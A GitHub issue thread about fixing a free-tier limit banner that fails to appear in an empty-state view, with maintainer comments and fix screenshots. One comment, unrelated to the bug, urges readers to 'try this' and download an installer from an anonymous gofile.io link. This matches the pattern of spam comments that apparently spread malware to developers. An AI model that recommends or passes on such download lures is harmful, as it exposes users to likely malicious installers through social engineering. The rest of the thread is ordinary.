### ISSUE TITLE
Fix edge case: SM free tier limit not visible in 'EmptyStateView

### ISSUE THREAD

**Issue by delattre1** [srosro/deepspring-shellmate#148]
esolve issue where the free tier limit notification isn't shown to users when they reach the limit but are viewing the 'EmptyStateView'.

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by plonkus** [comment]
Blocked by #146

**Comment by delattre1** [comment]
Fixed. 

Now both Fixed banners and other issues are visible at the EmptyMessagesView
![image_480](https://github.com/user-attachments/assets/8e8a03b5-9c73-4fab-8db6-de1051a9ef2a)



![image_480](https://github.com/user-attachments/assets/cec734d2-91ec-49e0-bb1a-1ab97555ff51)
![image_480](https://github.com/user-attachments/assets/4cf53d4c-897a-4efc-8eb0-1ba709ab276b)


![image_480](https://github.com/user-attachments/assets/13c46bff-6db0-4681-a361-06e6365d4a14)
